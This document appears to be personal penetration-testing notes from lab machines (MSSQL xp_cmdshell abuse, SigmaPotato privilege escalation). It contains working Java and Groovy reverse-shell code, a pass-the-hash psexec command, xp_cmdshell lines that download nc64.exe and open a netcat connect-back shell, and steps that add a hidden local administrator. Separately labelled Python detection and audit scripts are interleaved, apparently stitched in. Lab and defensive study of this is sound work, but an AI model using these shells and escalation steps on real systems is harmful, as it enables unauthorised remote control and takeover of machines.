Linux string processing: split the space-separated e-mail list in users.txt one per line and keep only the part before '@'
tr ' ' '\n' < users.txt | cut -d'@' -f1
sed 's/ /\n/g; s/@.*//' users.txt
tr ' ' '\n' < users.txt | cut -d'@' -f1 > usernames.txt
Java code to create a reverse shell
String host = "10.10.14.21";
int port = 4444;
String cmd = "/bin/bash";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();
Groovy
def host = "10.10.14.21"
def port = 4444
def pb = new ProcessBuilder("/bin/bash", "-i")
pb.redirectErrorStream(true)
def p = pb.start()
def s = new Socket(host, port)
def copy = { InputStream inS, OutputStream outS ->
    byte[] buf = new byte[4096]
    int len
    while ((len = inS.read(buf)) != -1) {
        outS.write(buf, 0, len)
        outS.flush()
    }
}
Thread.start { copy(p.inputStream, s.outputStream) }
Thread.start { copy(s.inputStream, p.outputStream) }
Find flag
find / -type f \( -name "flag.txt" -o -name "local.txt" \) 2>/dev/null
sudo find / -type f -iname 'psexec*.py' 2>/dev/null
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.226.212
impacket-psexec administrator@$IP
python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
After connecting to MSSQL (session transcript below):
Password:
[*] Encryption required, switching to TLS
[-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
lika@learning:~/Downloads$ smbclient \\\\$IP\\backups
Password for [WORKGROUP\lika]:
Try "help" to get a list of possible commands.
smb: \> exit
lika@learning:~/Downloads$ impacket-mssqlclient ARCHETYPE/sql_svc@$IP -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL (ARCHETYPE\sql_svc dbo@master)> SELECT is_srvrolemember('sysadmin');
-
1
SQL (ARCHETYPE\sql_svc dbo@master)> SELECT is_srvrolemember('sysadmin');
-
1
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC xp_cmdshell 'net user';
ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC sp_configure 'show advanced options', 1;
INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (ARCHETYPE\sql_svc dbo@master)> RECONFIGURE
SQL (ARCHETYPE\sql_svc dbo@master)> sp_configure;
SQL (ARCHETYPE\sql_svc dbo@master)> exec sp_configure 'xp_cmdshell', 1;
INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (ARCHETYPE\sql_svc dbo@master)> RECONFIGURE
SQL (ARCHETYPE\sql_svc dbo@master)>
Then use the xp_cmdshell command to create a bind shell with nc64.exe:
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.9 443"
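From the defender's side, the sequence above is a textbook detection opportunity: a SQL login checks for sysadmin, enables 'show advanced options' and 'xp_cmdshell' through sp_configure/RECONFIGURE, then calls xp_cmdshell with a PowerShell download cradle and a netcat connect-back (the nc64.exe command shown connects out to 10.10.14.9:443). The following Python is an added example, not part of these notes or of any tool mentioned here; it runs a few regexes over constructed query-log entries (login, statement) built from the statements in the session and labels each one by severity. The log format, severities and pattern set are my assumptions; a real deployment would feed it from SQL Server Audit or Extended Events.

```python
"""Added example: flag T-SQL that enables xp_cmdshell or uses it to fetch
and run a payload. The sample query log below is constructed for this
example from the statements in the session above."""
import re

# Enable sequence exactly as seen above: sp_configure + RECONFIGURE, then use.
ADVANCED_RE = re.compile(r"sp_configure\s+'show advanced options'\s*,\s*1", re.I)
ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)
XP_CMDSHELL_RE = re.compile(r"\bxp_cmdshell\b", re.I)
# Download cradle or netcat connect-back inside the executed command.
CRADLE_RE = re.compile(r"(wget|curl|Invoke-WebRequest|\biwr\b|-outfile|nc64?\.exe\s+-e)", re.I)

SAMPLE_LOG = [  # constructed: (login, statement)
    ("ARCHETYPE\\sql_svc", "SELECT is_srvrolemember('sysadmin');"),
    ("ARCHETYPE\\sql_svc", "EXEC sp_configure 'show advanced options', 1;"),
    ("ARCHETYPE\\sql_svc", "RECONFIGURE"),
    ("ARCHETYPE\\sql_svc", "exec sp_configure 'xp_cmdshell', 1;"),
    ("ARCHETYPE\\sql_svc", "RECONFIGURE"),
    ("ARCHETYPE\\sql_svc",
     "xp_cmdshell \"powershell -c cd C:\\Users\\sql_svc\\Downloads; "
     "wget http://10.10.14.9/nc64.exe -outfile nc64.exe\""),
    ("ARCHETYPE\\sql_svc",
     "xp_cmdshell \"powershell -c cd C:\\Users\\sql_svc\\Downloads; "
     ".\\nc64.exe -e cmd.exe 10.10.14.9 443\""),
    ("reporting_app", "SELECT TOP 10 * FROM sales.orders;"),
]


def classify(statement):
    """Return a severity label for one T-SQL statement, or None if benign."""
    if ENABLE_RE.search(statement):
        return "high: xp_cmdshell enabled via sp_configure"
    if XP_CMDSHELL_RE.search(statement):
        if CRADLE_RE.search(statement):
            return "critical: xp_cmdshell with download/connect-back"
        return "high: xp_cmdshell invocation"
    if ADVANCED_RE.search(statement):
        return "medium: advanced options exposed (precursor)"
    return None


def scan(log):
    """Return [(login, severity, statement)] for every suspicious entry."""
    return [(login, sev, stmt) for login, stmt in log
            if (sev := classify(stmt)) is not None]


if __name__ == "__main__":
    for login, sev, stmt in scan(SAMPLE_LOG):
        print(f"{sev:52} {login}: {stmt[:60]}")
```

The hardening that makes the whole chain fail is to leave xp_cmdshell disabled, not to grant the sysadmin role to an application login such as sql_svc, and to alert on any sp_configure change rather than only on xp_cmdshell itself.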
There are two ways to escalate privileges. The first is to search C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
PS C:\Users\sql_svc\Downloads> wget http://10.10.14.21/SigmaPotato.exe -outfile sigma.exe
PS C:\Users\sql_svc\Downloads> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
The second is to use SigmaPotato, since SeImpersonatePrivilege is enabled.
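The reason SeImpersonatePrivilege matters is visible in the whoami /priv listing above: it lets a process running as the service account impersonate a client that connects to its named pipe, which is how the SigmaPotato output below ends up with a SYSTEM token. When triaging a compromised service account, the first thing to read is that listing. The following Python is an added example (not from these notes or from SigmaPotato) that parses whoami /priv output and reports the privileges that enable local escalation; the privilege-to-risk table is my assumption and the sample text is the listing shown above.

```python
"""Added example: parse `whoami /priv` output and flag privileges that let
a compromised service account obtain a higher-privileged token."""
import re

# Privileges commonly abused for local privilege escalation (assumed table,
# not from the original notes). Description text is a short risk note.
ESCALATION_PRIVS = {
    "SeImpersonatePrivilege": "impersonate connecting clients (potato-style escalation)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open any process on the host",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# Sample input: the whoami /priv output shown in the notes above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

LINE_RE = re.compile(r"^(Se\w+)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privs(text):
    """Return {privilege_name: (description, state)} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            privs[m.group(1)] = (m.group(2), m.group(3))
    return privs


def risky_privs(privs):
    """Return sorted [(name, state, why)] for escalation-capable privileges.
    A 'Disabled' privilege is still held by the token and can be re-enabled
    by the process itself, so both states are reported."""
    return sorted((name, state, ESCALATION_PRIVS[name])
                  for name, (_, state) in privs.items() if name in ESCALATION_PRIVS)


if __name__ == "__main__":
    for name, state, why in risky_privs(parse_privs(SAMPLE_WHOAMI_PRIV)):
        print(f"{name:32} {state:9} {why}")
```

Service accounts hold SeImpersonatePrivilege by design, so the practical control is upstream: keep command execution out of reach of the service (xp_cmdshell disabled, no sysadmin for application logins), keep the host patched, and alert on service processes that spawn children through CreateProcessAsUser, which is exactly what the SigmaPotato output below shows.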
Add a user
PS C:\Users\sql_svc\Downloads> .\sigma.exe "net user lika lab@123456 /add"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 860 | Token: 0x820 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 988
[+] Current Command Length: 29 characters
[+] Creating Process via 'CreateProcessAsUserW'
[+] Process Started with PID: 2140
[+] Process Output:
The command completed successfully.
PS C:\Users\sql_svc\Downloads> net user
User accounts for \\ARCHETYPE
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
lika sql_svc WDAGUtilityAccount
The command completed successfully.
Add the user to the Administrators group
PS C:\Users\sql_svc\Downloads> .\sigma.exe "net localgroup Administrators lika /add"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 860 | Token: 0x820 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 996
[+] Current Command Length: 39 characters
[+] Creating Process via 'CreateProcessAsUserW'
[+] Process Started with PID: 376
[+] Process Output:
The command completed successfully.
PS C:\Users\sql_svc\Downloads> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
lika
The command completed successfully.
Then log in as lika with administrator rights.
cat * | grep -i 'passw'
Find folder
find . -type d -name "myfolder"
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
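Reading /etc/passwd by hand, as above, is mostly about spotting which accounts can actually log in (here root and robert have /bin/bash, everything else is nologin or /bin/false). The following Python is an added example, not part of these notes, that automates that review: it parses passwd lines and reports interactive shells, extra UID 0 accounts and empty password fields. The sample input is a subset of the listing above plus one constructed entry ("toor") added so that the UID 0 and empty-password checks have something to find.

```python
"""Added example: audit /etc/passwd for accounts that deserve a second look.
Sample content is taken from the listing above plus one constructed entry."""

# Shells that give an interactive login (assumed list; extend per distro).
INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/dash",
                      "/usr/bin/bash", "/usr/bin/zsh", "/usr/bin/fish"}

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
toor::0:0:constructed entry for this example:/root:/bin/bash
"""


def parse_passwd(text):
    """Parse passwd lines into dicts; blank or malformed lines are skipped."""
    users = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7 or not (parts[2].isdigit() and parts[3].isdigit()):
            continue
        name, pw, uid, gid, gecos, home, shell = parts
        users.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def audit_passwd(users):
    """Return [(username, finding)] in file order."""
    findings = []
    for u in users:
        if u["uid"] == 0 and u["name"] != "root":
            findings.append((u["name"], "extra UID 0 account"))
        if u["pw"] == "":
            # An empty second field means no password is required at all;
            # 'x' means the hash lives in /etc/shadow, which is the normal case.
            findings.append((u["name"], "empty password field"))
        if u["shell"] in INTERACTIVE_SHELLS:
            findings.append((u["name"], f"interactive shell {u['shell']}"))
    return findings


if __name__ == "__main__":
    for name, finding in audit_passwd(parse_passwd(SAMPLE_PASSWD)):
        print(f"{name:12} {finding}")
```

On a real host, pair this with a check of /etc/group for membership in groups such as sudo, docker or lxd (the lxd account above is a hint that the lxd group exists), since group membership rather than the passwd entry is what usually turns a low-privileged shell into root.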
find / -group bugtracker 2>/dev/null
Cross-compile for aarch64 Linux:
aarch64-linux-gnu-gcc -o ndsudo_x86 ndsudo.c
or for 64-bit x86 Linux:
x86_64-linux-gnu-gcc -o ndsudo_x86 ndsudo.c
Exp
MD5: 32 hexadecimal characters (128 bits).
SHA-1: 40 hexadecimal characters (160 bits).
SHA-256: 64 hexadecimal characters (256 bits).
SHA-512: 128 hexadecimal characters (512 bits).
https://www.tunnelsup.com/hash-analyzer/
| Hash Type | hashcat Mode (-m) |
|---|---|
| MD5 | 0 |
| SHA1 | 100 |
| bcrypt | 3200 |
| NTLM | 1000 |
| SHA-256 | 1400 |
| SHA-512 | 1700 |